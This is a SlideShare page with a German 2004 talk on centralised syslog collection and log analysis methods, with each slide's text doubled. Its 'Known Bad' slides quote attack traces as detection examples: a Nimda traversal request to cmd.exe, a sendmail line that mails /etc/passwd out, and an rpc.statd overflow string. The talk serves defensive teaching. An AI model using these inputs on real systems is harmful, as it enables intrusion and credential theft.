SlideShare uma empresa Scribd logo

LogFile Auswertung (log analysis)

Transferir como PPT, PDF
Rainer Gerhards
Rainer Gerhards

Historical presentation, held at November VIST 2004 (Viren Informations- und SicherheitsTage)

Tecnologia
1 de 29
Copyright © 2004 Adiscon GmbH www.adiscon.com Logfile AuswertungLogfile Auswertung „Getting it there and getting„Getting it there and getting something out of it...“something out of it...“ Rainer GerhardsRainer Gerhards AdisconAdiscon
Copyright © 2004 Adiscon GmbH www.adiscon.com Worum es geht...Worum es geht...  SammlungSammlung undund AuswertungAuswertung vonvon System-ProtokolldateienSystem-Protokolldateien • NutzenNutzen • MöglichkeitenMöglichkeiten • SchwierigkeitenSchwierigkeiten • LösungenLösungen  DenkansätzeDenkansätze • KEINE Produktpräsentation!KEINE Produktpräsentation! • KEINE fertigen Lösungen!KEINE fertigen Lösungen!
Copyright © 2004 Adiscon GmbH www.adiscon.com Was beinhalten Logs?Was beinhalten Logs?  Betriebsmanagement-InfosBetriebsmanagement-Infos  Securitymanagement-InfosSecuritymanagement-Infos • Benutzeran- und -abmeldungenBenutzeran- und -abmeldungen • Nachrichtenverkehr (Firewall, Router, ...)Nachrichtenverkehr (Firewall, Router, ...) • erkannte Viren/Malwareerkannte Viren/Malware • Zugriffe auf DatenobjekteZugriffe auf Datenobjekte • Ressourcenprobleme (out of space...)Ressourcenprobleme (out of space...) • und viel, viel mehr...und viel, viel mehr...
Copyright © 2004 Adiscon GmbH www.adiscon.com Nutzen von LogsNutzen von Logs  KapazitätsplanungenKapazitätsplanungen  FehleranalyseFehleranalyse  (Realzeit-)Alarmierung(Realzeit-)Alarmierung  BeweissicherungBeweissicherung  Forensische AnalyseForensische Analyse  (Interne) Auditierung(Interne) Auditierung  Achtung!Achtung! • DatenschutzDatenschutz • Mitbestimmungsrechte BetriebsratMitbestimmungsrechte Betriebsrat
Copyright © 2004 Adiscon GmbH www.adiscon.com „„getting it there...“getting it there...“  Logs liegen auf einzelnen GerätenLogs liegen auf einzelnen Geräten  es muss zentralisiert werden, umes muss zentralisiert werden, um Gesamtbild zu erhaltenGesamtbild zu erhalten  Herstellerlösungen decken oft nurHerstellerlösungen decken oft nur einen Teilbereich abeinen Teilbereich ab
Copyright © 2004 Adiscon GmbH www.adiscon.com LogquellenLogquellen  Geräte (Router, Firewall) mit syslogGeräte (Router, Firewall) mit syslog  *NIX syslog*NIX syslog  Windows Event LogsWindows Event Logs  TextdateienTextdateien  DatenbanktabellenDatenbanktabellen  serielle Geräteserielle Geräte  ......
Copyright © 2004 Adiscon GmbH www.adiscon.com Zugang zu Log-QuellenZugang zu Log-Quellen  je nach Systemje nach System • unterschiedlicher Zugriffunterschiedlicher Zugriff • unterschiedliches Meldungsformatunterschiedliches Meldungsformat • unterschiedliche Aussagekraftunterschiedliche Aussagekraft  Selbst gleiche Geräte, inSelbst gleiche Geräte, in unterschiedlichen Releases, erzeugenunterschiedlichen Releases, erzeugen unterschiedliche Log-Meldungenunterschiedliche Log-Meldungen  APIs in hohem Maße inkompatibelAPIs in hohem Maße inkompatibel
Copyright © 2004 Adiscon GmbH www.adiscon.com Lösung - syslogLösung - syslog  syslog ist kleinste gemeinsame Untermengesyslog ist kleinste gemeinsame Untermenge  ursprünglich entstanden im Umfeld vonursprünglich entstanden im Umfeld von sendmailsendmail  de-facto Standard (späte „Standardisierung“de-facto Standard (späte „Standardisierung“ bisher nur über einen informational RFC)bisher nur über einen informational RFC)  extrem einfach zu implementieren (undextrem einfach zu implementieren (und daher sehr große Unterstützung)daher sehr große Unterstützung)  sollte eine Logquelle kein syslogsollte eine Logquelle kein syslog unterstützen, gibt es bestimmt einenunterstützen, gibt es bestimmt einen Konverter dafür (z.B. EventReporter fürKonverter dafür (z.B. EventReporter für Windows Event Log)Windows Event Log)  syslog ist in der Praxis erprobt und bewährtsyslog ist in der Praxis erprobt und bewährt
Copyright © 2004 Adiscon GmbH www.adiscon.com syslog: formatsyslog: format  kurze Textmeldung (< 1024 byte)kurze Textmeldung (< 1024 byte)  Übermittlung via UDP (ungesichert)Übermittlung via UDP (ungesichert)  Facility/Severity: Numerische WerteFacility/Severity: Numerische Werte für Filterungfür Filterung  KEINE Spezifikation des TextteilesKEINE Spezifikation des Textteiles (anders als z.B. SNMP)(anders als z.B. SNMP) <38>Nov 12 15:11:26 su(pam_unix)[2246]: session opened for user root by rger(uid=500)
Copyright © 2004 Adiscon GmbH www.adiscon.com syslog: Der Meldungsinhalt...syslog: Der Meldungsinhalt...  leidiges Problemleidiges Problem  keine Standardisierung in Sichtkeine Standardisierung in Sicht  jeder Entwickler schickt, was er fürjeder Entwickler schickt, was er für richtig hält – und in dem Format, inrichtig hält – und in dem Format, in dem er es für richtig hält...dem er es für richtig hält...  Nachbearbeitung der MeldungenNachbearbeitung der Meldungen erforderlicherforderlich  verschiedene Analysetoolsverschiedene Analysetools
Copyright © 2004 Adiscon GmbH www.adiscon.com syslog: Bittere Pillen...syslog: Bittere Pillen...  Probleme aus der PraxisProbleme aus der Praxis • MeldungsverlusteMeldungsverluste • einfach zu fälscheneinfach zu fälschen • einfach mitzuleseneinfach mitzulesen  Fortentwicklung des ProtokollsFortentwicklung des Protokolls • IETF Arbeitsgruppe seit ca. 2000IETF Arbeitsgruppe seit ca. 2000 • syslog-protocol - neues Format, Layerssyslog-protocol - neues Format, Layers • syslog-sign - Signaturensyslog-sign - Signaturen • RFC 3195 (syslog-reliable) – sichere undRFC 3195 (syslog-reliable) – sichere und verschlüsselte Übertragungverschlüsselte Übertragung  Für viele Probleme finden sich Lösungen –Für viele Probleme finden sich Lösungen – man muss nur nachdenken...man muss nur nachdenken...
Copyright © 2004 Adiscon GmbH www.adiscon.com Aufbau der Log-InfrastrukturAufbau der Log-Infrastruktur  TypischTypisch • Systeme so konfigurieren, dass auch tatsächlichSysteme so konfigurieren, dass auch tatsächlich relevanterelevante Logs erzeugt werdenLogs erzeugt werden • Lieferung der Logdaten an ein zentrales SystemLieferung der Logdaten an ein zentrales System • evtl. (Near)-RealTime Alertingevtl. (Near)-RealTime Alerting • Auswertung auf dem zentralen SystemAuswertung auf dem zentralen System  je nach Aufgabenstellung natürlich gänzlichje nach Aufgabenstellung natürlich gänzlich verschiedene Strukturenverschiedene Strukturen • DatenschutzDatenschutz • Beweissicherung / AuditierungBeweissicherung / Auditierung
Copyright © 2004 Adiscon GmbH www.adiscon.com Beispiel: Relay-ArchitekturBeispiel: Relay-Architektur
Copyright © 2004 Adiscon GmbH www.adiscon.com Speicherung der LogdateienSpeicherung der Logdateien  DatenbankenDatenbanken • einfache Abfrageeinfache Abfrage • für große Logmengen ungeeignetfür große Logmengen ungeeignet (Durchsatz)(Durchsatz)  TextdateienTextdateien • sehr viel besserer Durchsatzsehr viel besserer Durchsatz • von vielen Tools unterstütztvon vielen Tools unterstützt • in der interaktiven Analyse problematischin der interaktiven Analyse problematisch  Gespeicherte Logs müssen besondersGespeicherte Logs müssen besonders gegen Manipulation geschützt werden!gegen Manipulation geschützt werden!
Copyright © 2004 Adiscon GmbH www.adiscon.com „„getting something out of it...“getting something out of it...“ The common item to look for whenThe common item to look for when reviewing log files is anything thatreviewing log files is anything that appears out of the ordinary.appears out of the ordinary. CERT Coordination CenterCERT Coordination Center Intrusion Detection ChecklistIntrusion Detection Checklist
Copyright © 2004 Adiscon GmbH www.adiscon.com Einige Auswertungsverfahren...Einige Auswertungsverfahren...  Basierend auf SignaturenBasierend auf Signaturen • kown badkown bad • „„artificial ignorance“ (Marcus Ranum)artificial ignorance“ (Marcus Ranum)  Basierend auf StatistikenBasierend auf Statistiken  „„Never before seen“Never before seen“
Copyright © 2004 Adiscon GmbH www.adiscon.com Known BadKnown Bad  vergleichbar Virensignaturdateienvergleichbar Virensignaturdateien  bekannte Muster von Attackenbekannte Muster von Attacken  besondere Problematik: je nachbesondere Problematik: je nach meldendem System/Version könnenmeldendem System/Version können die Signaturen unterschiedlich seindie Signaturen unterschiedlich sein
Copyright © 2004 Adiscon GmbH www.adiscon.com Beispiele „Known Bad“ IBeispiele „Known Bad“ I  Nimda:Nimda: 204.120.69.195 - - [18/Sep/2001:09:35:19204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%-0500] "GET /scripts/..% %35%63../winnt/system32 /cmd.exe?/c+dir%35%63../winnt/system32 /cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"HTTP/1.0" 400 215 "-" "-"  Sendmail Exploits:Sendmail Exploits: Jul 21 01:25:49 ariel sendmail[308]:Jul 21 01:25:49 ariel sendmail[308]: BAA00307: to=lamarbroc@delphi.com,BAA00307: to=lamarbroc@delphi.com, ctladdr=":/bin/mail root@ariel.sdsc.eductladdr=":/bin/mail root@ariel.sdsc.edu </etc/passwd", delay=00:00:34, mailer=smtp,</etc/passwd", delay=00:00:34, mailer=smtp, relay=bos1h.delphi.com. (192.80.63.8),relay=bos1h.delphi.com. (192.80.63.8), stat=Sent (Ok.)stat=Sent (Ok.)
Copyright © 2004 Adiscon GmbH www.adiscon.com Beispiele „Known Bad“ IIBeispiele „Known Bad“ II  Buffer Overflows:Buffer Overflows: Jan 02 16:19:45 xxx.xxx.xxx.xxx rpc.statd[351]:Jan 02 16:19:45 xxx.xxx.xxx.xxx rpc.statd[351]: gethostbyname error forgethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 804971090909090687465676274736f6d616e797265206520726f7804971090909090687465676274736f6d616e797265206520726f7 220726f66220726f66 bffff718bffff718 bffff719 bffff71abffff719 bffff71a bffff71bbffff71b     !! !!   
Copyright © 2004 Adiscon GmbH www.adiscon.com Known Good /Known Good / Artificial IgnoranceArtificial Ignorance  bekannte Log-Einträge werdenbekannte Log-Einträge werden ausgefiltertausgefiltert  Parameter in den Einträgen erfordernParameter in den Einträgen erfordern oft spezielle Beachtungoft spezielle Beachtung  Nur die verbleibenden Einträge werdenNur die verbleibenden Einträge werden beachtetbeachtet  ACHTUNG: „Gute“ Einträge könnenACHTUNG: „Gute“ Einträge können auch von (erfolgreichen) Attackenauch von (erfolgreichen) Attacken erzeugt worden sein.erzeugt worden sein.
Copyright © 2004 Adiscon GmbH www.adiscon.com StatistikenStatistiken  Betrachtet werdenBetrachtet werden • bestimmte Messzahlen (z.B.bestimmte Messzahlen (z.B. Verkehrsvolumen)Verkehrsvolumen) • (syslog-) Meldungsvolumen selbst(syslog-) Meldungsvolumen selbst  Vergleich von aktuellem Wert zuVergleich von aktuellem Wert zu statistischem Mittelwertstatistischem Mittelwert  Signifikante Abweichungen könnenSignifikante Abweichungen können auf ein Problem hindeutenauf ein Problem hindeuten • ABER: Feiertage können signifikanteABER: Feiertage können signifikante Abweichungen erzeugen...Abweichungen erzeugen...
Copyright © 2004 Adiscon GmbH www.adiscon.com Never before SeenNever before Seen  Besonders beachtenswert sindBesonders beachtenswert sind • Ereignisse, die noch NIEMALS aufgetretenEreignisse, die noch NIEMALS aufgetreten sind (Marcus Ranum, loganlysis list)sind (Marcus Ranum, loganlysis list) • Ereignisse, die extrem selten auftretenEreignisse, die extrem selten auftreten (Rainer Gerhards, „Needle in Haystack“)(Rainer Gerhards, „Needle in Haystack“)  Vorsicht: Neue Software-VersionenVorsicht: Neue Software-Versionen oder Geräte können Ergebnisoder Geräte können Ergebnis temporär verfälschen!temporär verfälschen!
Copyright © 2004 Adiscon GmbH www.adiscon.com Automatische Analyse IAutomatische Analyse I  Gefahr von „false positives“ sehr hochGefahr von „false positives“ sehr hoch  zu viel Automatik kann evtl. selbst zuzu viel Automatik kann evtl. selbst zu denial of service genutzt werden:denial of service genutzt werden: • auto-Regel (basierend auf „kown bad“)auto-Regel (basierend auf „kown bad“) schließt Firewall für IPs, von denenschließt Firewall für IPs, von denen Attacken ausgehenAttacken ausgehen • Attackierender spooft Pakete mit fremdenAttackierender spooft Pakete mit fremden IPs für einen gesamten RangeIPs für einen gesamten Range • Ergebnis: unsere Regel sperrt dieErgebnis: unsere Regel sperrt die gespooften IPs aus... autsch ;)gespooften IPs aus... autsch ;)
Copyright © 2004 Adiscon GmbH www.adiscon.com Automatische Analyse IIAutomatische Analyse II  automatische Alarme sollten manuellautomatische Alarme sollten manuell überprüft werdenüberprüft werden  automatische Aktionen könnenautomatische Aktionen können verwendet werden, wenn diesverwendet werden, wenn dies zwingend erforderlich erscheint. Dannzwingend erforderlich erscheint. Dann müssen aber alle Konsequenzenmüssen aber alle Konsequenzen durchdacht werden!durchdacht werden!
Copyright © 2004 Adiscon GmbH www.adiscon.com Unterstützung der manuellenUnterstützung der manuellen AnalyseAnalyse  Komprimierung und KonsolidierungKomprimierung und Konsolidierung notwendignotwendig  dem Analysierenden muss der Zugangdem Analysierenden muss der Zugang zu den Low-Level Informationenzu den Low-Level Informationen einfach möglich sein (oftmals kann nureinfach möglich sein (oftmals kann nur damit eine endgültige Entscheidungdamit eine endgültige Entscheidung gefällt werden)gefällt werden)
Copyright © 2004 Adiscon GmbH www.adiscon.com ZusammenfassungZusammenfassung  Log-Dateien beinhalten sehr hilfreicheLog-Dateien beinhalten sehr hilfreiche InformationenInformationen  Strategie zum zentralen SammelnStrategie zum zentralen Sammeln zwingend erforderlichzwingend erforderlich  In heterogenen Umgebungen istIn heterogenen Umgebungen ist syslog oft die einzige Möglichkeit, hatsyslog oft die einzige Möglichkeit, hat aber Restriktionenaber Restriktionen  In der Analyse nicht nur aufIn der Analyse nicht nur auf Automatiken verlassen.Automatiken verlassen.
Copyright © 2004 Adiscon GmbH www.adiscon.com Fragen?Fragen?  rgerhards@adiscon.comrgerhards@adiscon.com  www.adiscon.comwww.adiscon.com  www.monitorware.comwww.monitorware.com Adiscon GmbH Franz-Marc-Str. 144 50374 Erftstadt 0800-ADISCON (0800/2347266) info@adiscon.com
Copyright © 2004 Adiscon GmbH www.adiscon.com Weitere Interessante LinksWeitere Interessante Links  www.loganalysis.orgwww.loganalysis.org  www.sans.orgwww.sans.org  http://www.dshield.com/http://www.dshield.com/  www.syslog.cc/ietf/www.syslog.cc/ietf/  http://www.ietf.org/html.charters/syslohttp://www.ietf.org/html.charters/syslo g-charter.htmlg-charter.html  http://www.monitorware.com/en/workihttp://www.monitorware.com/en/worki nprogress/nature-of-syslog-data.phpnprogress/nature-of-syslog-data.php  http://www.monitorware.com/en/workihttp://www.monitorware.com/en/worki nprogress/Needle-in-Haystack.phpnprogress/Needle-in-Haystack.php
Copyright © 2004 Adiscon GmbH www.adiscon.com DanksagungDanksagung  Der Autor möchte sich insbesondereDer Autor möchte sich insbesondere bei Dr. Tina Bird vonbei Dr. Tina Bird von www.loganalysis.org für diewww.loganalysis.org für die Überlassung einiger Beispiele ausÜberlassung einiger Beispiele aus Ihrem Loganalyse-Seminar bedanken.Ihrem Loganalyse-Seminar bedanken.

Recomendados

Rsyslog version naming (v8.6.0+)
Rsyslog version naming (v8.6.0+)Rsyslog version naming (v8.6.0+)
Rsyslog version naming (v8.6.0+)Rainer Gerhards
 
RSYSLOG v8 improvements and how to write plugins in any language.
RSYSLOG v8 improvements and how to write plugins in any language.RSYSLOG v8 improvements and how to write plugins in any language.
RSYSLOG v8 improvements and how to write plugins in any language.Rainer Gerhards
 
AuroraWP - Infracoders Meetup Graz
AuroraWP - Infracoders Meetup GrazAuroraWP - Infracoders Meetup Graz
AuroraWP - Infracoders Meetup GrazInfralovers
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityJonathan Weiss
 
DevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das Unternehmen
DevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das UnternehmenDevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das Unternehmen
DevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das Unternehmencynapspro GmbH
 
Eine Stunde was mit Api First!
Eine Stunde was mit Api First!Eine Stunde was mit Api First!
Eine Stunde was mit Api First!JanWeinschenker
 
2011 10 05 11-15 stefan flück
2011 10 05 11-15 stefan flück2011 10 05 11-15 stefan flück
2011 10 05 11-15 stefan flücktopsoft - inspiring digital business
 
Developer Week 2019: Identity & Access Management in der Realitaet
Developer Week 2019: Identity & Access Management in der RealitaetDeveloper Week 2019: Identity & Access Management in der Realitaet
Developer Week 2019: Identity & Access Management in der RealitaetRobin Sedlaczek
 

Recomendados

Rsyslog version naming (v8.6.0+)
Rsyslog version naming (v8.6.0+)Rsyslog version naming (v8.6.0+)
Rsyslog version naming (v8.6.0+)Rainer Gerhards
 
RSYSLOG v8 improvements and how to write plugins in any language.
RSYSLOG v8 improvements and how to write plugins in any language.RSYSLOG v8 improvements and how to write plugins in any language.
RSYSLOG v8 improvements and how to write plugins in any language.Rainer Gerhards
 
AuroraWP - Infracoders Meetup Graz
AuroraWP - Infracoders Meetup GrazAuroraWP - Infracoders Meetup Graz
AuroraWP - Infracoders Meetup GrazInfralovers
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityJonathan Weiss
 
DevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das Unternehmen
DevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das UnternehmenDevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das Unternehmen
DevicePro Ultimate 2009 - Die Loesung - Ihre Vorteile - Das Unternehmencynapspro GmbH
 
Eine Stunde was mit Api First!
Eine Stunde was mit Api First!Eine Stunde was mit Api First!
Eine Stunde was mit Api First!JanWeinschenker
 
2011 10 05 11-15 stefan flück
2011 10 05 11-15 stefan flück2011 10 05 11-15 stefan flück
2011 10 05 11-15 stefan flücktopsoft - inspiring digital business
 
Developer Week 2019: Identity & Access Management in der Realitaet
Developer Week 2019: Identity & Access Management in der RealitaetDeveloper Week 2019: Identity & Access Management in der Realitaet
Developer Week 2019: Identity & Access Management in der RealitaetRobin Sedlaczek
 
Ec13 xpages-basic
Ec13 xpages-basicEc13 xpages-basic
Ec13 xpages-basicUlrich Krause
 
Setting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
Setting-up Elasticsearch, Logstash, Kibana für agile DatenanalyseSetting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
Setting-up Elasticsearch, Logstash, Kibana für agile DatenanalyseSHI Search | Analytics | Big Data
 
NRWConf2013_T4CodeGeneration
NRWConf2013_T4CodeGenerationNRWConf2013_T4CodeGeneration
NRWConf2013_T4CodeGenerationChristian Giesswein
 
Einfürung iPhone Entwicklung
Einfürung iPhone EntwicklungEinfürung iPhone Entwicklung
Einfürung iPhone EntwicklungStuff Mc
 
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...netlogix
 
WS: Uhl, Lisog - Deutsche Wolke
WS: Uhl, Lisog - Deutsche WolkeWS: Uhl, Lisog - Deutsche Wolke
WS: Uhl, Lisog - Deutsche WolkeCloudOps Summit
 
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)hastexo
 
Day CQ 5.3 WCM - Was ist neu
Day CQ 5.3 WCM - Was ist neuDay CQ 5.3 WCM - Was ist neu
Day CQ 5.3 WCM - Was ist neuCédric Hüsler
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als CodeJan Gehring
 
Ec2009 Templates
Ec2009 TemplatesEc2009 Templates
Ec2009 TemplatesUlrich Krause
 
PHP Summit 2013 - Make or Buy?
PHP Summit 2013 - Make or Buy?PHP Summit 2013 - Make or Buy?
PHP Summit 2013 - Make or Buy?Sebastian Heuer
 
Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Carsten Muetzlitz
 
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbasDOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbasCarsten Muetzlitz
 
Cloud Architekturen - von "less Server" zu Serverless
Cloud Architekturen - von "less Server" zu ServerlessCloud Architekturen - von "less Server" zu Serverless
Cloud Architekturen - von "less Server" zu ServerlessOPEN KNOWLEDGE GmbH
 
How-to Video heute: im Web, mobile und überhaupt
How-to Video heute: im Web, mobile und überhauptHow-to Video heute: im Web, mobile und überhaupt
How-to Video heute: im Web, mobile und überhauptBokowsky + Laymann GmbH
 
20160229_ModernApplicationDevelopment_Python_KPatenge
20160229_ModernApplicationDevelopment_Python_KPatenge20160229_ModernApplicationDevelopment_Python_KPatenge
20160229_ModernApplicationDevelopment_Python_KPatengeKarin Patenge
 
Oracle Information Rights Management Introduction (German)
Oracle Information Rights Management Introduction (German)Oracle Information Rights Management Introduction (German)
Oracle Information Rights Management Introduction (German)Carsten Muetzlitz
 
Oracle Database Security Assessment Tool (DBSAT)
Oracle Database Security Assessment Tool (DBSAT)Oracle Database Security Assessment Tool (DBSAT)
Oracle Database Security Assessment Tool (DBSAT)OPITZ CONSULTING Deutschland
 
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...inPuncto GmbH
 
Offline Arbeiten
Offline ArbeitenOffline Arbeiten
Offline ArbeitenJens-Christian Fischer
 
Sicherheit im Internet - Wie kann man sich schützen?
Sicherheit im Internet - Wie kann man sich schützen?Sicherheit im Internet - Wie kann man sich schützen?
Sicherheit im Internet - Wie kann man sich schützen?Rainer Gerhards
 
rsyslog meets docker
rsyslog meets dockerrsyslog meets docker
rsyslog meets dockerRainer Gerhards
 

Mais conteúdo relacionado

Semelhante a LogFile Auswertung (log analysis)

Setting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
Setting-up Elasticsearch, Logstash, Kibana für agile DatenanalyseSetting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
Setting-up Elasticsearch, Logstash, Kibana für agile DatenanalyseSHI Search | Analytics | Big Data
 
Einfürung iPhone Entwicklung
Einfürung iPhone EntwicklungEinfürung iPhone Entwicklung
Einfürung iPhone EntwicklungStuff Mc
 
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...netlogix
 
WS: Uhl, Lisog - Deutsche Wolke
WS: Uhl, Lisog - Deutsche WolkeWS: Uhl, Lisog - Deutsche Wolke
WS: Uhl, Lisog - Deutsche WolkeCloudOps Summit
 
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)hastexo
 
Day CQ 5.3 WCM - Was ist neu
Day CQ 5.3 WCM - Was ist neuDay CQ 5.3 WCM - Was ist neu
Day CQ 5.3 WCM - Was ist neuCédric Hüsler
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als CodeJan Gehring
 
PHP Summit 2013 - Make or Buy?
PHP Summit 2013 - Make or Buy?PHP Summit 2013 - Make or Buy?
PHP Summit 2013 - Make or Buy?Sebastian Heuer
 
Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Carsten Muetzlitz
 
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbasDOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbasCarsten Muetzlitz
 
Cloud Architekturen - von "less Server" zu Serverless
Cloud Architekturen - von "less Server" zu ServerlessCloud Architekturen - von "less Server" zu Serverless
Cloud Architekturen - von "less Server" zu ServerlessOPEN KNOWLEDGE GmbH
 
How-to Video heute: im Web, mobile und überhaupt
How-to Video heute: im Web, mobile und überhauptHow-to Video heute: im Web, mobile und überhaupt
How-to Video heute: im Web, mobile und überhauptBokowsky + Laymann GmbH
 
20160229_ModernApplicationDevelopment_Python_KPatenge
20160229_ModernApplicationDevelopment_Python_KPatenge20160229_ModernApplicationDevelopment_Python_KPatenge
20160229_ModernApplicationDevelopment_Python_KPatengeKarin Patenge
 
Oracle Information Rights Management Introduction (German)
Oracle Information Rights Management Introduction (German)Oracle Information Rights Management Introduction (German)
Oracle Information Rights Management Introduction (German)Carsten Muetzlitz
 
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...inPuncto GmbH
 

Semelhante a LogFile Auswertung (log analysis) (20)

Ec13 xpages-basic
Ec13 xpages-basicEc13 xpages-basic
Ec13 xpages-basic
 
Setting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
Setting-up Elasticsearch, Logstash, Kibana für agile DatenanalyseSetting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
Setting-up Elasticsearch, Logstash, Kibana für agile Datenanalyse
 
NRWConf2013_T4CodeGeneration
NRWConf2013_T4CodeGenerationNRWConf2013_T4CodeGeneration
NRWConf2013_T4CodeGeneration
 
Einfürung iPhone Entwicklung
Einfürung iPhone EntwicklungEinfürung iPhone Entwicklung
Einfürung iPhone Entwicklung
 
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
EMA - Enterprise Managed Archive: globales Informationsmanagement clever gel...
 
WS: Uhl, Lisog - Deutsche Wolke
WS: Uhl, Lisog - Deutsche WolkeWS: Uhl, Lisog - Deutsche Wolke
WS: Uhl, Lisog - Deutsche Wolke
 
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
Mit OpenStack zur eigenen Cloud (LinuxTag 2012)
 
Day CQ 5.3 WCM - Was ist neu
Day CQ 5.3 WCM - Was ist neuDay CQ 5.3 WCM - Was ist neu
Day CQ 5.3 WCM - Was ist neu
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als Code
 
Ec2009 Templates
Ec2009 TemplatesEc2009 Templates
Ec2009 Templates
 
PHP Summit 2013 - Make or Buy?
PHP Summit 2013 - Make or Buy?PHP Summit 2013 - Make or Buy?
PHP Summit 2013 - Make or Buy?
 
Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Hardening Oracle Databases (German)
Hardening Oracle Databases (German)
 
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbasDOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
DOAG SIG Security 2014 in Hamburg: Enterprise User Security for DBAs #eus4dbas
 
Cloud Architekturen - von "less Server" zu Serverless
Cloud Architekturen - von "less Server" zu ServerlessCloud Architekturen - von "less Server" zu Serverless
Cloud Architekturen - von "less Server" zu Serverless
 
How-to Video heute: im Web, mobile und überhaupt
How-to Video heute: im Web, mobile und überhauptHow-to Video heute: im Web, mobile und überhaupt
How-to Video heute: im Web, mobile und überhaupt
 
20160229_ModernApplicationDevelopment_Python_KPatenge
20160229_ModernApplicationDevelopment_Python_KPatenge20160229_ModernApplicationDevelopment_Python_KPatenge
20160229_ModernApplicationDevelopment_Python_KPatenge
 
Oracle Information Rights Management Introduction (German)
Oracle Information Rights Management Introduction (German)Oracle Information Rights Management Introduction (German)
Oracle Information Rights Management Introduction (German)
 
Oracle Database Security Assessment Tool (DBSAT)
Oracle Database Security Assessment Tool (DBSAT)Oracle Database Security Assessment Tool (DBSAT)
Oracle Database Security Assessment Tool (DBSAT)
 
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
Dokumente in SAP ablegen und an SAP-Prozesse übergeben - inPuncto Produktport...
 
Offline Arbeiten
Offline ArbeitenOffline Arbeiten
Offline Arbeiten
 

Mais de Rainer Gerhards

Sicherheit im Internet - Wie kann man sich schützen?
Sicherheit im Internet - Wie kann man sich schützen?Sicherheit im Internet - Wie kann man sich schützen?
Sicherheit im Internet - Wie kann man sich schützen?Rainer Gerhards
 
Using Wildcards with rsyslog's File Monitor imfile
